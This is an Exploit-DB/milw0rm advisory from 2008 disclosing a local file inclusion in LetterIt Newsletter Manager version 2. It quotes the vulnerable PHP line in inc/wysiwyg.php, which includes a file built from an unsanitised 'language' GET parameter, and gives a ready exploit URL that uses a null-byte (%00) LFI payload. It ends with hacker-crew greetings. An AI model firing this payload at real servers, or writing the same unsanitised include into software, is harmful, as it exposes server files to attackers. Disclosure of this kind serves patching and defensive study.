LetterIt 2 - 'Language' Local File Inclusion

EDB-ID:

6179

Author:

NoGe

Type:

webapps

Platform:

PHP

Published:

2008-07-31

====================================================================


  [o] LetterIt 2 Local File Inclusion Vulnerability

       Software : LetterIt Newsletter Manager version 2
       Vendor   : http://www.letterit.de/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


====================================================================


  [o] Vulnerable file

       inc/wysiwyg.php

        include("../language/".$_GET['language'].".php");



  [o] Exploit

       http://localhost/[path]/inc/wysiwyg.php?language=[LFI]%00


====================================================================


  [o] Greetz

       supported by irc.nob0dy.net
       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ martfella
       skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke

        
====================================================================

# milw0rm.com [2008-07-31]